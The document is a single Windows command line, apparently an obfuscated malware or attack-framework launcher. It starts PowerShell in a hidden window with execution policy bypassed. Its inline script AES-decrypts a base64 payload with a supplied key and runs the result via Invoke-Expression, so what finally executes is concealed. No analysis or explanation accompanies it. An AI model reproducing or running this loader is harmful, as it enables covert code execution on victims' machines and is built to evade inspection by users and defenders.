"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {param($a, $b) $KEYIV = '3Q1aUNn15Me1VlTQAQdGsm8ekXBkW2FFrSBt93j4N9Hg2QMZ60uGi6hdUECTkmywWn5vE4REAgxDeSoQIFpLq0zLiYkkC3WftAtNr6bgSVPoN2eYpSVCgq7FapPgUIfMZiDkS4Z7ibn7XIe6LuOlTPHS0ibnAmKQ5eCYXNZdOKzILr7TAIImXk5QH61FidAIOBZrbTQpHYRM98yNGmvMOzONCZQfuvr'; $command = [System.Convert]::FromBase64String($a); $key = [System.Convert]::FromBase64String($b); $e = New-Object System.Security.Cryptography.AesManaged; $e.Key = $key; $e.IV = $command[0..15]; $f = $e.CreateDecryptor(); $g = $f.TransformFinalBlock($command[16..$command.Length], 0, $command.Length - 16); $h = [System.Text.Encoding]::UTF8.GetString($g); Invoke-Expression $h; }" -a "qs9K8ECrxJ4RYgoGXBOVA5zoSztl2ZXPpldKefb9lZYVjASx3hpM1DG7Td3mzXA7B5gsnqQ74Cf8nu4rHbTQMgCpXtC7lraiyB1QP5NLcaIqIUGuJEX8Yeh6OaMu87mbALezjUugDAG8K6pcwYBuptmyjFZy3nos4aELD9IL8TOAxjBh/YryQcekOlA++MRBusflRl3EOvlALID34VFe304kjnyI10ZlLqUrqV3m7ag=" -b "I2gGFN92JQ7raC35ha14JzISlRbQCYzWrkxCskiY01c="